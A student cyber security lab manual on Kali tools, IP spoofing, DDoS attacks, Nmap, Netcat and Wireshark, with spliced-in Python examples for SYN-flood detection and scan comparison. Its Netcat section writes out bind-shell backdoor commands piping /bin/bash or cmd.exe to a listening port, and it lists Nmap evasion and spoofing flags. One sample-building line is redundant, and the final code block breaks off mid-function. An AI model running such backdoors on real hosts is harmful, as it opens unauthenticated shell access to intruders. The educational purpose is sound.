CS Lab Manual

Uploaded by darjihemil4902

Cyber Security(3150714) 221170107010

Practical-1

Install Kali Linux. Examine the utilities and tools available in Kali Linux and
find out which tools are best for finding cyber attacks/vulnerabilities.

Tools in Kali Linux for finding cyber attacks/vulnerabilities:

Nmap:

Nmap, short for Network Mapper, is a free, open-source tool for network
discovery and security auditing; with its scripting engine it can also check for
some known vulnerabilities. Network administrators use Nmap to identify what
devices are running on their networks, discover which hosts are available and
the services they offer, find open ports and detect security risks.

Nmap can be used to monitor single hosts as well as vast networks that
encompass hundreds of thousands of devices and multitudes of subnets.

Though Nmap has evolved over the years and is extremely flexible, at heart
it's a port-scan tool, gathering information by sending raw packets to
system ports. It listens for responses and determines whether ports are
open, closed or filtered in some way by, for example, a firewall. Other terms
used for port scanning include port discovery or enumeration.

Wireshark:
Wireshark is the world's leading network traffic analyzer, and an essential tool for any
security professional or systems administrator. This free software lets you analyze
network traffic in real time, and is often the best tool for troubleshooting issues on
your network.

Common problems that Wireshark can help troubleshoot include dropped packets,
latency issues, and malicious activity on your network. It lets you put your network
traffic under a microscope, and provides tools to filter and drill down into that traffic,
zooming in on the root cause of the problem. Administrators use it to identify faulty
network appliances that are dropping packets, latency issues caused by machines
routing traffic halfway around the world, and data exfiltration or even hacking
attempts against your organization.

WPScan:
WPScan is an open source WordPress security scanner. You can use it to scan your
WordPress website for known vulnerabilities within the WordPress core, as well as
popular WordPress plugins and themes.

Since it is a WordPress black box scanner, it mimics a real attacker. This means it does
not rely on any sort of access to your WordPress dashboard or source code to conduct
the tests. In other words, if WPScan can find a vulnerability in your
WordPress website, so can an attacker.

Practical-2
Evaluate network defence tools for the following:
1. IP spoofing
2. DoS attack

IP spoofing:
IP spoofing is the creation of Internet Protocol (IP) packets with a modified source
address, in order to hide the identity of the sender, to impersonate another computer
system, or both. It is a technique often used by attackers to launch DDoS attacks against a
target device or the surrounding infrastructure.

IP spoofing is essentially a technique used by attackers to gain unauthorized access to
computers. The concept was discussed in academic circles as early as the 1980s and was
known to security experts at a theoretical level. It remained largely theoretical until
Robert Morris described a weakness in TCP known as sequence number prediction. IP
spoofing is also used to mask the origin of a DoS attack; in fact, DoS attacks usually
hide the actual IP address from which the attack originates.

Process:
With IP spoofing, the intruder sends a message to a computer system with a source IP
address indicating that the message comes from a different address than it actually
does. If the intent is to gain unauthorized access, the spoofed IP address will be that of
a system the target considers a trusted host. To carry out an IP spoofing attack, the
attacker must first find the IP address of a machine that the target system considers a
trusted source, using any of a variety of techniques. Having obtained a trusted IP address,
the attacker modifies the packet headers of their transmission so that the packets appear
to come from that host. Because the target's replies go to the trusted host rather than to
the attacker, the attacker never sees them and must predict the TCP sequence numbers the
target will use; this is why sequence prediction is central to the attack.

Different ways to address IP spoofing include:

1. Do not reveal any information about your internal IP addresses. This helps prevent
those addresses from being spoofed.
2. Monitor incoming IP packets for signs of IP spoofing using network monitoring
software. One such product, Netlog, along with similar products, looks for incoming
packets on the external interface that have both source and destination IP addresses
in your local domain. Such a packet claims to be from inside the network but is
actually coming from outside it; finding one means that an attack is underway.

The danger with IP spoofing is that some firewalls do not examine packets that appear
to come from an internal IP address. Spoofed packets can be routed through a filtering
router if it is not configured to drop incoming packets whose source address is in the
local domain.

Examples of router configurations that are potentially vulnerable include:

1. Routers to external networks that support multiple internal interfaces.
2. Proxy firewalls where the proxy applications use the source IP address for
authentication.
3. Routers with two interfaces that support subnetting on the internal network.
4. Routers that do not filter packets whose source address is in the local domain.

DoS attack:
Imagine that you are visiting some websites and one of them seems a little slow. You
might assume its servers are overloaded by a burst of legitimate user traffic, and most
sites plan for that in advance. But the site may instead be the victim of a Distributed
Denial of Service (DDoS) attack: a denial of service launched from many sources at once.

In a DDoS attack, the attacker tries to make a particular service unavailable by directing
continuous, heavy traffic at it from multiple end systems. The network and server
resources are consumed serving requests from those false end systems, so that legitimate
users are unable to reach the service.

Types of DDoS attacks –

DDoS attacks can be divided into three major categories:

1. Application layer attacks –

These attacks focus on attacking the layer 7 of the OSI model where the
webpages are generated in response to the request initiated by the end user.
For a client, generating a request does not take any heavy load and it can easily
generate multiple requests to the server. On the other hand, responding to a
request takes considerable load for the server as it has to build all the pages,
compute any queries and load the results from the database according to the
request.

Examples: HTTP Flood attack and attack on DNS Services.

2. Protocol attacks –

They are also known as state-exhaustion attacks. These attacks target weaknesses in
layers 3 and 4 of the protocol stack and consume the connection-state tables of servers,
firewalls and load balancers.
Examples: SYN Flood attack and Ping of Death.

3. Volumetric attacks –

Volumetric attacks consume the target's network bandwidth, saturating it through
amplification or a botnet so that the service is unavailable to its users. They are easy
to generate by directing a massive amount of traffic at the target server.
Examples: NTP Amplification, DNS Amplification, UDP Flood attack and TCP Flood attack.

Common DDoS attacks –

1. SYN Flood attack –

A SYN Flood attack works the way a mischievous child keeps ringing the doorbell
(request) and running away. The old person inside comes out, opens the door and sees
no one (no response). After enough such visits the old person is exhausted and stops
answering even genuine callers. A SYN flood exploits the TCP three-way handshake by
sending a stream of SYN segments, usually from spoofed source addresses. The victim
server replies to each with a SYN-ACK and holds a half-open connection in its backlog,
but the final ACK never arrives; once the backlog is full, new legitimate connections
are refused.
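The half-open connection state that a SYN flood exhausts can be measured from a packet capture. The following added Python example (not part of the original manual) reconstructs handshakes from constructed TCP segment records, counts the flows per server that never received the client's final ACK, and flags a server when the half-open share is high. The sample traffic, the thresholds (50 half-open flows, 80% incomplete) and the 3-second handshake window are assumptions for the example.

```python
from collections import defaultdict
from typing import Dict, List, NamedTuple, Tuple


class Seg(NamedTuple):
    ts: float     # capture timestamp in seconds
    src: str
    sport: int
    dst: str
    dport: int
    flags: str    # "S" = SYN, "SA" = SYN-ACK, "A" = ACK (as a client would send)


def half_open_report(segments: List[Seg], window: float = 3.0
                     ) -> Dict[Tuple[str, int], Tuple[int, int, int]]:
    """Reconstruct client->server handshakes.

    A flow (src, sport, dst, dport) is 'completed' if the client's ACK arrives
    within `window` seconds of its SYN; otherwise it stays half-open, which is
    the state a SYN flood piles up in the server's backlog.
    Returns {(server_ip, port): (half_open, completed, distinct_sources)}.
    """
    syn_time = {}
    completed = set()
    for s in sorted(segments, key=lambda x: x.ts):
        flow = (s.src, s.sport, s.dst, s.dport)
        if s.flags == "S":
            syn_time[flow] = s.ts
        elif s.flags == "A" and flow in syn_time and s.ts - syn_time[flow] <= window:
            completed.add(flow)
    report = defaultdict(lambda: [0, 0, set()])
    for flow in syn_time:
        entry = report[(flow[2], flow[3])]
        entry[1 if flow in completed else 0] += 1
        entry[2].add(flow[0])
    return {k: (v[0], v[1], len(v[2])) for k, v in report.items()}


def syn_flood_suspects(segments: List[Seg], window: float = 3.0,
                       min_half_open: int = 50, min_ratio: float = 0.8):
    """Servers whose handshake traffic is dominated by half-open flows."""
    out = []
    for server, (half, done, srcs) in half_open_report(segments, window).items():
        if half >= min_half_open and half / (half + done) >= min_ratio:
            out.append((server, half, done, srcs))
    return out


def build_sample() -> List[Seg]:
    """Constructed traffic: 5 real clients complete the handshake, then 200
    spoofed sources send SYNs that are answered but never acknowledged."""
    segs, t, server = [], 0.0, "192.168.1.10"
    for i in range(5):
        src, sport = f"10.0.0.{i + 1}", 40000 + i
        segs.append(Seg(t, src, sport, server, 80, "S"))
        segs.append(Seg(t + 0.01, server, 80, src, sport, "SA"))
        segs.append(Seg(t + 0.02, src, sport, server, 80, "A"))
        t += 0.1
    for i in range(200):
        src, sport = f"203.0.113.{i % 250 + 1}" if i < 250 else "", 1024 + i
        src = f"203.0.{i // 250}.{i % 250 + 1}"   # 200 distinct spoofed sources
        segs.append(Seg(t, src, sport, server, 80, "S"))
        segs.append(Seg(t + 0.01, server, 80, src, sport, "SA"))   # victim answers, ACK never comes
        t += 0.005
    return segs


if __name__ == "__main__":
    for server, half, done, srcs in syn_flood_suspects(build_sample()):
        print(f"SYN flood suspected on {server[0]}:{server[1]}: "
              f"{half} half-open vs {done} completed from {srcs} sources")
```

On a real capture the same logic runs over the SYN/SYN-ACK/ACK segments exported from Wireshark or tcpdump; the high count of distinct sources with exactly one SYN each is the signature that separates a flood from a single misbehaving client, and it is the reason SYN cookies (which avoid storing backlog state until the ACK arrives) defeat this attack.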

HTTP flood attack –

In an HTTP Flood attack, large numbers of HTTP requests are sent simultaneously to a
target server. Each request is cheap for the client but expensive for the server, so the
server's resources are exhausted and it fails to serve real users' requests. The main
variations are the HTTP GET flood and the HTTP POST flood.

DNS amplification –

Imagine calling a pizza shop and asking them to call a number back and read out every
combination of pizzas, toppings and desserts they offer. You generated a large output
from a very small input; the catch is that the number you gave them is not yours.
Similarly, DNS amplification works by sending a small DNS query to an open resolver
with the source address spoofed to the victim's IP, and crafting the request so that the
resolver's response is many times larger; the resolver then delivers that large answer to
the victim.

Practical-3
EXPLORE THE NMAP TOOL AND LIST HOW IT CAN BE USED FOR
NETWORK DEFENCE.

Nmap is a free open source tool, employed to discover hosts and services on a
computer network by sending packets and analyzing the retrieved responses. Nmap
offers some features for probing computer networks, including host discovery and
service and operating system detection.

● Nmap can provide further information on targets, including reverse DNS
names, device types, and MAC addresses.
● Host discovery – Identifying hosts on a network. For example, listing the hosts
that respond to TCP and/or ICMP requests or have a particular port open.
● Port scanning – Enumerating the open ports on target hosts.
● OS detection – Determining the operating system and hardware
characteristics of network devices.
● Version detection – Interrogating network services on remote devices to
determine the application name and version number.
● Scriptable interaction with the target using the Nmap Scripting Engine
(NSE).

Usage of Nmap
● Auditing the security of a device or firewall by identifying the network
connections which can be made to, or through it.
● Identifying open ports on a target host in preparation for auditing.
● Network inventory, network mapping, and maintenance and asset
management.
● Auditing the security of a network by identifying new servers.
● Generating traffic to hosts on a network, response analysis and response time
measurement.
● Finding known vulnerabilities in a network (and, with some NSE scripts, exploiting them).
● DNS queries and subdomain search

Nmap – How it can be used for network defense.


Nmap ("Network Mapper") is an open source tool for network exploration and
security auditing. It was designed to rapidly scan large networks, although it works
fine against single hosts. Nmap uses raw IP packets in novel ways to determine what
hosts are available on the network, what services (application name and version)
those hosts are offering, what operating systems (and OS versions) they are running,
what type of packet filters/firewalls are in use, and dozens of other characteristics.
While Nmap is commonly used for security audits, many systems and network
administrators find it useful for routine tasks such as network inventory, managing
service upgrade schedules, and monitoring host or service uptime.

The output from Nmap is a list of scanned targets, with supplemental information on
each depending on the options used. Key among that information is the "interesting
ports table". That table lists the port number and protocol, service name, and state.
The state is either open, filtered, closed, or unfiltered. Open means that an
application on the target machine is listening for connections/packets on that port.
Filtered means that a firewall, filter, or other network obstacle is blocking the port so
that Nmap cannot tell whether it is open or closed. Closed ports have no application
listening on them, though they could open up at any time. Ports are classified as
unfiltered when they are responsive to Nmap's probes, but Nmap cannot determine
whether they are open or closed. Nmap reports the state combinations open|filtered
and closed|filtered when it cannot determine which of the two states describe a
port. The port table may also include software version details when version detection
has been requested. When an IP protocol scan is requested (-sO), Nmap provides
information on supported IP protocols rather than listening ports.

In addition to the interesting ports table, Nmap can provide further information on
targets, including reverse DNS names, operating system guesses, device types, and
MAC addresses. A typical Nmap scan is shown in Example 1. The only Nmap
arguments used in this example are -A, to enable OS and version detection, script
scanning, and traceroute; -T4 for faster execution; and then the hostname.

Example 1. A representative Nmap scan

# nmap -A -T4 scanme.nmap.org

Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.029s latency).
rDNS record for 74.207.244.221: li86-221.members.linode.com
Not shown: 995 closed ports
PORT     STATE    SERVICE     VERSION
22/tcp   open     ssh         OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)
| ssh-hostkey: 1024 8d:60:f1:7c:ca:b7:3d:0a:d6:67:54:9d:69:d9:b9:dd (DSA)
|_2048 79:f8:09:ac:d4:e2:32:42:10:49:d3:bd:20:82:85:ec (RSA)
80/tcp   open     http        Apache httpd 2.2.14 ((Ubuntu))
|_http-title: Go ahead and ScanMe!
646/tcp  filtered ldp
1720/tcp filtered H.323/Q.931
9929/tcp open     nping-echo  Nping echo
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.39
OS details: Linux 2.6.39
Network Distance: 11 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
[Cut first 10 hops for brevity]
11  17.65 ms li86-221.members.linode.com (74.207.244.221)

Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

Various options that can be passed to Nmap:

TARGET SPECIFICATION:
  Can pass hostnames, IP addresses, networks, etc.
  Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
  -iL <inputfilename>: Input from list of hosts/networks
  -iR <num hosts>: Choose random targets
  --exclude <host1[,host2][,host3],...>: Exclude hosts/networks
  --excludefile <exclude_file>: Exclude list from file
HOST DISCOVERY:
  -sL: List Scan - simply list targets to scan
  -sn: Ping Scan - disable port scan
  -Pn: Treat all hosts as online -- skip host discovery
  -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
  -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
  -PO[protocol list]: IP Protocol Ping
  -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
  --dns-servers <serv1[,serv2],...>: Specify custom DNS servers
  --system-dns: Use OS's DNS resolver
  --traceroute: Trace hop path to each host
SCAN TECHNIQUES:
  -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
  -sU: UDP Scan
  -sN/sF/sX: TCP Null, FIN, and Xmas scans
  --scanflags <flags>: Customize TCP scan flags
  -sI <zombie host[:probeport]>: Idle scan
  -sY/sZ: SCTP INIT/COOKIE-ECHO scans
  -sO: IP protocol scan
  -b <FTP relay host>: FTP bounce scan
PORT SPECIFICATION AND SCAN ORDER:
  -p <port ranges>: Only scan specified ports
    Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
  --exclude-ports <port ranges>: Exclude the specified ports from scanning
  -F: Fast mode - Scan fewer ports than the default scan
  -r: Scan ports consecutively - don't randomize
  --top-ports <number>: Scan <number> most common ports
  --port-ratio <ratio>: Scan ports more common than <ratio>
SERVICE/VERSION DETECTION:
  -sV: Probe open ports to determine service/version info
  --version-intensity <level>: Set from 0 (light) to 9 (try all probes)
  --version-light: Limit to most likely probes (intensity 2)
  --version-all: Try every single probe (intensity 9)
  --version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
  -sC: equivalent to --script=default
  --script=<Lua scripts>: <Lua scripts> is a comma separated list of
           directories, script-files or script-categories
  --script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts
  --script-args-file=filename: provide NSE script args in a file
  --script-trace: Show all data sent and received
  --script-updatedb: Update the script database.
  --script-help=<Lua scripts>: Show help about scripts.
           <Lua scripts> is a comma-separated list of script-files or
           script-categories.
OS DETECTION:
  -O: Enable OS detection
  --osscan-limit: Limit OS detection to promising targets
  --osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
  Options which take <time> are in seconds, or append 'ms' (milliseconds),
  's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
  -T<0-5>: Set timing template (higher is faster)
  --min-hostgroup/max-hostgroup <size>: Parallel host scan group sizes
  --min-parallelism/max-parallelism <numprobes>: Probe parallelization
  --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies
      probe round trip time.
  --max-retries <tries>: Caps number of port scan probe retransmissions.
  --host-timeout <time>: Give up on target after this long
  --scan-delay/--max-scan-delay <time>: Adjust delay between probes
  --min-rate <number>: Send packets no slower than <number> per second
  --max-rate <number>: Send packets no faster than <number> per second
FIREWALL/IDS EVASION AND SPOOFING:
  -f; --mtu <val>: fragment packets (optionally w/given MTU)
  -D <decoy1,decoy2[,ME],...>: Cloak a scan with decoys
  -S <IP_Address>: Spoof source address
  -e <iface>: Use specified interface
  -g/--source-port <portnum>: Use given port number
  --proxies <url1,[url2],...>: Relay connections through HTTP/SOCKS4 proxies
  --data <hex string>: Append a custom payload to sent packets
  --data-string <string>: Append a custom ASCII string to sent packets
  --data-length <num>: Append random data to sent packets
  --ip-options <options>: Send packets with specified ip options
  --ttl <val>: Set IP time-to-live field
  --spoof-mac <mac address/prefix/vendor name>: Spoof your MAC address
  --badsum: Send packets with a bogus TCP/UDP/SCTP checksum
OUTPUT:
  -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and
     Grepable format, respectively, to the given filename.
  -oA <basename>: Output in the three major formats at once
  -v: Increase verbosity level (use -vv or more for greater effect)
  -d: Increase debugging level (use -dd or more for greater effect)
  --reason: Display the reason a port is in a particular state
  --open: Only show open (or possibly open) ports
  --packet-trace: Show all packets sent and received
  --iflist: Print host interfaces and routes (for debugging)
  --append-output: Append to rather than clobber specified output files
  --resume <filename>: Resume an aborted scan
  --stylesheet <path/URL>: XSL stylesheet to transform XML output to HTML
  --webxml: Reference stylesheet from Nmap.Org for more portable XML
  --no-stylesheet: Prevent associating of XSL stylesheet w/XML output
MISC:
  -6: Enable IPv6 scanning
  -A: Enable OS detection, version detection, script scanning, and traceroute
  --datadir <dirname>: Specify custom Nmap data file location
  --send-eth/--send-ip: Send using raw ethernet frames or IP packets
  --privileged: Assume that the user is fully privileged
  --unprivileged: Assume the user lacks raw socket privileges
  -V: Print version number
  -h: Print this help summary page.
EXAMPLES:
  nmap -v -A scanme.nmap.org
  nmap -v -sn 192.168.0.0/16 10.0.0.0/8
  nmap -v -iR 10000 -Pn -p 80

Everything on the Nmap command-line that isn't an option (or option argument) is
treated as a target host specification. The simplest case is to specify a target IP
address or hostname for scanning.
When a hostname is given as a target, it is resolved via the Domain Name System
(DNS) to determine the IP address to scan. If the name resolves to more than one IP
address, only the first one will be scanned. To make Nmap scan all the resolved
addresses instead of only the first one, use the --resolve-all option.

Sometimes you wish to scan a whole network of adjacent hosts. For this, Nmap
supports CIDR-style addressing. You can append /numbits to an IP address or
hostname and Nmap will scan every IP address for which the first numbits are the
same as for the reference IP or hostname given. For example, 192.168.10.0/24 would
scan the 256 hosts between 192.168.10.0 (binary: 11000000 10101000 00001010
00000000) and 192.168.10.255 (binary: 11000000 10101000 00001010 11111111),
inclusive. 192.168.10.40/24 would scan exactly the same targets. Given that the host
scanme.nmap.org is at the IP address 64.13.134.52, the specification
scanme.nmap.org/16 would scan the 65,536 IP addresses between 64.13.0.0 and
64.13.255.255. The smallest allowed value is /0, which targets the whole Internet.
The largest value for IPv4 is /32, which scans just the named host or IP address
because all address bits are fixed. The largest value for IPv6 is /128, which does the
same thing.
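One concrete way to use the port table for defence, as the "identifying new servers" bullet above suggests, is to keep a baseline scan and diff every later scan against it. The following added Python example (not part of the original manual or of Nmap) parses the grepable output that -oG writes and reports new hosts, newly open ports and ports that are no longer open. The two scan outputs are constructed samples in the -oG line format; the host addresses and services in them are assumptions.

```python
from typing import Dict, Tuple

PortKey = Tuple[int, str]                    # (port, protocol)
HostTable = Dict[str, Dict[PortKey, Tuple[str, str]]]   # ip -> {(port, proto): (state, service)}


def parse_grepable(text: str) -> HostTable:
    """Parse `nmap -oG` output.

    Each 'Host:' line is tab-separated; the 'Ports:' field holds comma-separated
    entries of the form port/state/proto/owner/service/rpcinfo/version/.
    Lines starting with '#' are Nmap's own comments and are skipped.
    """
    hosts: HostTable = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = line.split("\t")
        ip = fields[0].split()[1]
        hosts.setdefault(ip, {})
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue
            for entry in field[len("Ports:"):].strip().split(", "):
                parts = entry.split("/")
                port, state, proto, service = int(parts[0]), parts[1], parts[2], parts[4]
                hosts[ip][(port, proto)] = (state, service)
    return hosts


def diff_scans(baseline: HostTable, current: HostTable) -> dict:
    """Compare two parsed scans; anything newly open is a change to investigate."""
    new_hosts = sorted(set(current) - set(baseline))
    new_open, no_longer_open = [], []
    for ip, ports in current.items():
        base = baseline.get(ip, {})
        for key, (state, svc) in ports.items():
            if state == "open" and base.get(key, ("closed", ""))[0] != "open":
                new_open.append((ip, key[0], key[1], svc))
    for ip, ports in baseline.items():
        for key, (state, svc) in ports.items():
            if state == "open" and current.get(ip, {}).get(key, ("closed", ""))[0] != "open":
                no_longer_open.append((ip, key[0], key[1], svc))
    return {"new_hosts": new_hosts,
            "new_open": sorted(new_open),
            "no_longer_open": sorted(no_longer_open)}


# Constructed -oG samples (not real scan output).
BASELINE = (
    "# Nmap 7.94 scan initiated (constructed sample)\n"
    "Host: 192.168.1.10 ()\tStatus: Up\n"
    "Host: 192.168.1.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9/, "
    "80/open/tcp//http//nginx/\tIgnored State: closed (998)\n"
    "# Nmap done (constructed sample)\n"
)
CURRENT = (
    "# Nmap 7.94 scan initiated (constructed sample)\n"
    "Host: 192.168.1.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9/, "
    "80/open/tcp//http//nginx/, 3306/open/tcp//mysql//MySQL 8.0/\tIgnored State: closed (997)\n"
    "Host: 192.168.1.77 ()\tPorts: 445/open/tcp//microsoft-ds///\tIgnored State: filtered (999)\n"
)

if __name__ == "__main__":
    changes = diff_scans(parse_grepable(BASELINE), parse_grepable(CURRENT))
    for kind, items in changes.items():
        for item in items:
            print(f"{kind}: {item}")
```

Run the real scans with the same options each time (for example nmap -sS -p- -oG today.gnmap 192.168.1.0/24) so that differences reflect the network and not the scan; a database port that appears on a web server overnight, as in the sample, is exactly the kind of change this catches.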

EXAMPLES (the screenshots from the original manual are not reproduced here):

1. Scan using hostname
2. Scan using IP address
3. Scan using the "-v" option
4. Scan OS information and traceroute
5. Enable OS detection with Nmap
6. Scan a host to detect a firewall
7. Find live hosts in a network


Practical-4
Explore the NetCat tool:

Netcat (nc) is a utility that reads and writes data across TCP and UDP connections. It is
used both in attacks and in defence: it helps to debug and investigate the network. It is
available for all major operating systems.

Getting Started with Netcat

The most basic option is the help command, which lists all the options that can be used
with Netcat: nc -h

Connecting to a Server

To connect to a server at a specific port where a particular service is running, give the
target IP address and the port. Here we connect to an FTP server at 192.168.17.43 on
port 21, i.e. FTP.

Syntax: nc [Target IP Address] [Target Port]
nc 192.168.17.43 21

Chatting
Netcat can also be used to chat between two users. We need to establish a connection
before chatting, so we need two devices: one plays the role of listener and the other
the role of initiator. Once the connection is established, both ends can send text. Here
a Windows 10 machine plays the role of listener and a Kali Linux machine the role of
initiator. First we create the listener: nc -lvvp 4444 where,
[-l]: Listen mode
[-vv]: Verbose mode (one -v is enough, but two makes the output more verbose)
[-p]: Local port
Now we create the initiator: give the IP address of the system where the listener was
started, followed by the port number: nc <listener IP> 4444. Anything typed at either end
is delivered, unencrypted, to the other.
Creating a backdoor

Netcat can also create a backdoor: a listener on the target system that we can come back
to at any time. Command for a Linux system: nc -l -p 2222 -e /bin/bash

For a Windows system: nc -l -p 1337 -e cmd.exe

This opens a listener on the target that pipes the Windows command shell or the Linux
bash shell to whoever connects: nc 192.168.1.35 2222

Note that -e is only available in netcat-traditional and in Ncat (as --exec or -e); the
OpenBSD netcat shipped by default on many distributions has no -e option. The shell is
exposed without any authentication or encryption, so anyone who can reach the port gets
it; this is why an unexpected listener on an odd port is worth investigating on a
defended host.

Verbose mode

Verbose mode is enabled with the [-v] parameter and produces extended information about
the connection. Connecting to the same server twice, once with and once without -v, shows
the difference between normal and verbose mode. The command is: nc 192.168.17.43 21 -v

Save Output to Desktop

For record keeping, readability and future reference we can save what Netcat sends and
receives. The -o parameter of netcat-traditional writes a hex dump of the traffic to the
given file: nc 192.168.17.43 21 -v -o /root/Desktop/Result.txt

File Transfer

Netcat can transfer a file between devices. Here a file is sent from a Windows system to a
Kali Linux system. On the Windows side, Netcat listens and feeds the file to whoever
connects: nc -v -w 20 -p 8888 -l < file.txt
On the Kali side, connect and redirect what arrives into a file: nc -v <windows IP> 8888 > file.txt
The transfer ends when the sender closes the connection (-w 20 gives up after 20 seconds
of inactivity). Nothing is authenticated or encrypted, so use this only on a trusted
network.
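What the listener and the connecting side actually do on the wire during the file transfer above, as an added Python example (not part of the original manual or of Netcat): the listener accepts one client and streams the bytes, and the client reads until the sender closes the connection, which is the EOF that ends an nc transfer. It runs entirely on 127.0.0.1 with an ephemeral port chosen by the OS; the sample data is constructed.

```python
import socket
import threading


def serve_file(data: bytes, host: str = "127.0.0.1") -> int:
    """Listener side, the equivalent of `nc -l -p PORT < file.txt`.

    Binds an ephemeral port, accepts exactly one client in a background thread,
    streams `data` to it and closes. Returns the port so the client can connect.
    Nothing authenticates the client: whoever connects first gets the file.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))          # port 0 = let the OS pick a free port
    srv.listen(1)
    port = srv.getsockname()[1]

    def run() -> None:
        conn, _peer = srv.accept()
        with conn:
            conn.sendall(data)   # closing conn afterwards is the EOF the receiver waits for
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return port


def fetch_file(host: str, port: int, timeout: float = 5.0) -> bytes:
    """Client side, the equivalent of `nc host PORT > file.txt`: read until EOF."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as conn:
        while True:
            block = conn.recv(4096)
            if not block:        # empty read = peer closed = transfer complete
                break
            chunks.append(block)
    return b"".join(chunks)


def transfer(data: bytes) -> bytes:
    """Round-trip helper: serve `data` on loopback and fetch it back."""
    port = serve_file(data)
    return fetch_file("127.0.0.1", port)


if __name__ == "__main__":
    sample = b"constructed sample file contents\n" * 4
    print(len(transfer(sample)), "bytes received")
```

The bytes cross the network exactly as sent, so a Wireshark capture on the path shows the whole file in the TCP stream; for anything sensitive, tunnel the transfer over SSH (scp) instead of raw netcat.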

Practical-5

Use a wireshark tool and explore the packet format and content at each
OSI layer.
What is Wireshark?

Wireshark is a network packet analyzer. A network packet analyzer presents
captured packet data in as much detail as possible.

You could think of a network packet analyzer as a measuring device for examining
what's happening inside a network cable, just like an electrician uses a voltmeter for
examining what's happening inside an electric cable (but at a higher level, of
course).

In the past, such tools were either very expensive, proprietary, or both. However,
with the advent of Wireshark, that has changed. Wireshark is available for free,
is open source, and is one of the best packet analyzers available today. Here are
some reasons people use Wireshark:

● Network administrators use it to troubleshoot network problems
● Network security engineers use it to examine security problems
● QA engineers use it to verify network applications
● Developers use it to debug protocol implementations
● People use it to learn network protocol internals

Wireshark can also be helpful in many other situations.

The following are some of the many features Wireshark provides:

● Available for UNIX and Windows.
● Capture live packet data from a network interface.
● Open files containing packet data captured with tcpdump/WinDump,
Wireshark, and many other packet capture programs.
● Import packets from text files containing hex dumps of packet data.
● Display packets with very detailed protocol information.
● Save packet data captured.
● Export some or all packets in a number of capture file formats.
● Filter packets on many criteria.
● Search for packets on many criteria.
● Colorize packet display based on filters.
● Create various statistics.

Wireshark captures packets and lets you examine their contents.



Open Source Software

Wireshark is an open source software project, and is released under the
GNU GPL. You can freely use Wireshark on any number of computers you like,
without worrying about license keys or fees or such. In addition, all source code
is freely available under the GPL. Because of that, it is very easy for people to
add new protocols to Wireshark, either as plugins, or built into the source, and
they often do!

● Wireshark isn’t an intrusion detection system. It will not warn you when
someone does strange things on your network that he/she isn’t allowed to
do. However, if strange things happen, Wireshark might help you figure out
what is really going on.

● Wireshark will not manipulate things on the network, it will only "measure"
things from it. Wireshark doesn't send packets on the network or do other
active things (except domain name resolution, but that can be disabled).

You can get the latest copy of the program from the Wireshark website at
https://www.wireshark.org/download.html. The download page should automatically
highlight the appropriate download for your platform and direct you to the nearest
mirror. Official Windows and macOS installers are signed by the Wireshark
Foundation.

Common Wireshark Use Cases


Here’s a common example of how a Wireshark capture can assist in identifying a
problem. The figure below shows an issue on a home network, where the internet
connection was very slow.

As the figure shows, the router thought a common destination was unreachable. This
was discovered by drilling down into the ICMPv6 (Internet Control Message Protocol
for IPv6) traffic, which Wireshark's default colouring rules highlight in black; the
black rows flag packets that indicate some sort of problem.

In this case, Wireshark helped determine that the router wasn't working properly and
couldn't reach YouTube reliably. The problem was resolved by restarting the cable
modem. Of course, while this particular problem didn't necessitate using Wireshark,
it's kind of cool to authoritatively pin down the issue.

This shows the innards of a TCP packet that is part of a Transport Layer Security
(TLS) conversation. This is a great example of how you can drill down into a
captured packet.

Wireshark doesn't allow you to read the encrypted contents of the packet, but you can
identify the version of TLS the browser and YouTube are using to encrypt things,
because the TLS record header and the handshake messages are sent in the clear.
Interestingly enough, the encryption shifted to TLS version 1.2 during the capture.

Wireshark is often used to identify more complex network issues. For example, if a
network experiences too many retransmissions, congestion can occur. By using
Wireshark, you can identify specific retransmission issues, as shown below in
Figure.
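The drill-down described above, layer by layer, as an added Python example that is not part of the original manual or of Wireshark. It builds one constructed Ethernet II frame carrying IPv4, TCP and a TLS application-data record (the MAC and IP addresses, ports and sequence numbers are made up for the example), then decodes each layer the way Wireshark's packet details pane does, verifies the IPv4 header checksum, and reads the TLS version from the record header without decrypting anything. Note that a TLS 1.3 connection still writes 0x0303 (TLS 1.2) into its record headers for compatibility; the negotiated version is only visible in the handshake messages.

```python
import struct
from typing import Dict

TLS_VERSIONS = {0x0301: "TLS 1.0", 0x0302: "TLS 1.1", 0x0303: "TLS 1.2"}


def ip_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (IPv4 header checksum)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_frame(payload: bytes) -> bytes:
    """Constructed sample frame: Ethernet II -> IPv4 -> TCP (PSH,ACK) -> payload."""
    eth = bytes.fromhex("00112233445566778899aabb") + b"\x08\x00"   # dst MAC, src MAC, EtherType IPv4
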